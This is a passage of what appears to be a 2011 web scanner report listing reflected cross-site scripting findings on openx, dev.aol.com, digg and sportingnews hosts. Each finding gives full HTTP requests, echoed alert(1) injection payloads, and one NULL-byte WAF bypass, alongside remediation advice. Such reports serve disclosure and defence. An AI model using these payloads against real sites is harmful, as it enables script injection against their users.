Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1100

MQA._covCallback({"map": [{"opt": false, "copyrights": [{"text": "NAVTEQ", "html": "<img align='top' src='http://tile21.mqcdn.com/res/ntcopy_dark.gif' width='45' height='11' class='mqacopyswitch mqaco
...[SNIP]...
yrights": [{"text": "i-cubed", "html": null, "group": "Imagery", "id": "i3"}], "id": "i3"}]},"format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat&b8261<script>alert(1)</script>64e42659620=1")

5.74. http://d.tradex.openx.com/afr.php [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64156</script><script>alert(1)</script>5e557625608 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE64156</script><script>alert(1)</script>5e557625608 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=0318609e4899f4eef14c1bdd55dccb7d; expires=Fri, 04-May-2012 00:59:53 GMT; path=/
Content-Length: 3654
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE64156</script><script>alert(1)</script>5e557625608&loc=")', 65000);
// ]]>
...[SNIP]...

5.75. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19a0</script><script>alert(1)</script>1f2595708be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE&a19a0</script><script>alert(1)</script>1f2595708be=1 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=41ceb160f94c774738d19cd8e91c39ef; expires=Fri, 04-May-2012 01:00:00 GMT; path=/
Content-Length: 3660
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=65&zoneid=3606&cb=INSERT_RANDOM_NUMBER_HERE&a19a0</script><script>alert(1)</script>1f2595708be=1&loc=")', 65000);
// ]]>
...[SNIP]...

5.76. http://d.tradex.openx.com/afr.php [zoneid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the zoneid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 767dd</script><script>alert(1)</script>21a4c215031 was submitted in the zoneid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=65&zoneid=3606767dd</script><script>alert(1)</script>21a4c215031&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=f74278266cdb1b8473acb25c7b316621; expires=Fri, 04-May-2012 00:59:42 GMT; path=/
Content-Length: 853
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=65&zoneid=3606767dd</script><script>alert(1)</script>21a4c215031&cb=INSERT_RANDOM_NUMBER_HERE&loc=")', 65000);
// ]]>
...[SNIP]...

5.77. http://dev.aol.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44dac"-alert(1)-"5c1e0974f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?44dac"-alert(1)-"5c1e0974f61=1 HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304610976566-Repeat%7C1367682976566%3B%20s_nrgvo%3DRepeat%7C1367682976568%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 11:10:48 GMT
Server: Apache
Set-Cookie: RSP_DAEMON=db7023215051147ee79a8596304debb9; path=/; HttpOnly
Set-Cookie: RSP_DAEMON=a41cc5d6c93fa2f59be7062a842ab853; path=/; HttpOnly
Set-Cookie: SESSad0659a5e17377ebcd7da6b8d8fff621=ba17ae41e03a9b08a1801ca15dd2dc35; path=/; domain=.dev.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Cteonnt-Length: 16122
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
op1=s_265.pfxID + " : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/?44dac"-alert(1)-"5c1e0974f61=1"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.78. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0aa8"-alert(1)-"51d1db99da0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themesa0aa8"-alert(1)-"51d1db99da0/zen/dac_2009/favicon.ico HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:10:55 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
_265.pfxID + " : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themesa0aa8"-alert(1)-"51d1db99da0/zen/dac_2009/favicon.ico"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.79. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 382d8"-alert(1)-"22026a1b8d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes/zen382d8"-alert(1)-"22026a1b8d3/dac_2009/favicon.ico HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:10:57 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
.pfxID + " : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themes/zen382d8"-alert(1)-"22026a1b8d3/dac_2009/favicon.ico"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.80. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e49c1"-alert(1)-"ff73b5a19e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes/zen/dac_2009e49c1"-alert(1)-"ff73b5a19e7/favicon.ico HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:10:59 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:10:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
" : " + "devaolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themes/zen/dac_2009e49c1"-alert(1)-"ff73b5a19e7/favicon.ico"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.81. http://dev.aol.com/themes/zen/dac_2009/favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.aol.com
Path:   /themes/zen/dac_2009/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67568"-alert(1)-"863d34e5ea4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /themes/zen/dac_2009/favicon.ico67568"-alert(1)-"863d34e5ea4 HTTP/1.1
Host: dev.aol.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; RSP_DAEMON=db7023215051147ee79a8596304debb9; SESSad0659a5e17377ebcd7da6b8d8fff621=25e39137937ec4f94fa1fb6511eab2bf; s_pers=%20s_getnr%3D1304611839510-Repeat%7C1367683839510%3B%20s_nrgvo%3DRepeat%7C1367683839512%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 11:11:01 GMT
Server: Apache
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Thu, 05 May 2011 11:11:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
ntCoent-Length: 6548
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 6548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta http-equ
...[SNIP]...
aolcom"
s_265.prop2=s_265.pfxID + " : " + ""
s_265.prop3=""
s_265.prop4=""
s_265.prop6=""
s_265.prop7=""
s_265.prop8=""
s_265.prop10=""
s_265.prop12="http://dev.aol.com/themes/zen/dac_2009/favicon.ico67568"-alert(1)-"863d34e5ea4"
s_265.linkDownloadFileTypes="gadget,msi"
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_265.t();if(s_code)document.write(s_code);
//]]>
...[SNIP]...

5.82. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b2815"><script>alert(1)</script>03c666340fe was submitted in the REST URL parameter 1. This input was echoed as b2815"><script>alert(1)</script>03c666340fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /%00b2815"><script>alert(1)</script>03c666340fe HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-779404137262479208%3A203; expires=Fri, 06-May-2011 10:53:04 GMT; path=/; domain=digg.com
Set-Cookie: d=d50133d15ecf2dcd7ba69de08580494f90965e3d73b97e5fa32ac2711cba5273; expires=Tue, 04-May-2021 21:00:44 GMT; path=/; domain=.digg.com
X-Digg-Time: D=600466 10.2.128.119
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17123

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/%00b2815"><script>alert(1)</script>03c666340fe.rss">
...[SNIP]...

5.83. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/free

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbae5"%3b7b2f70e4cdd was submitted in the REST URL parameter 1. This input was echoed as bbae5";7b2f70e4cdd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseballbbae5"%3b7b2f70e4cdd/free HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:04 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13085

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName=":baseballbbae5";7b2f70e4cdd:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1=":premium content:baseballbbae5";7b2f70e4cdd:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.84. http://fantasysource.sportingnews.com/baseball/free [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/free

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93bb6"%3bc5e8272f943 was submitted in the REST URL parameter 2. This input was echoed as 93bb6";c5e8272f943 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball/free93bb6"%3bc5e8272f943 HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:05 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13083

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName="mlb:free93bb6";c5e8272f943:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1="mlb:premium content:free93bb6";c5e8272f943:error";
s_265.prop12=document.URL.split('?')[0];
...[SNIP]...

5.85. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/promo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b8bc"%3b5944e8d17f4 was submitted in the REST URL parameter 1. This input was echoed as 3b8bc";5944e8d17f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball3b8bc"%3b5944e8d17f4/promo HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:04 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13085

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName=":baseball3b8bc";5944e8d17f4:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1=":premium content:baseball3b8bc";5944e8d17f4:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.86. http://fantasysource.sportingnews.com/baseball/promo [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/promo

Issue detail

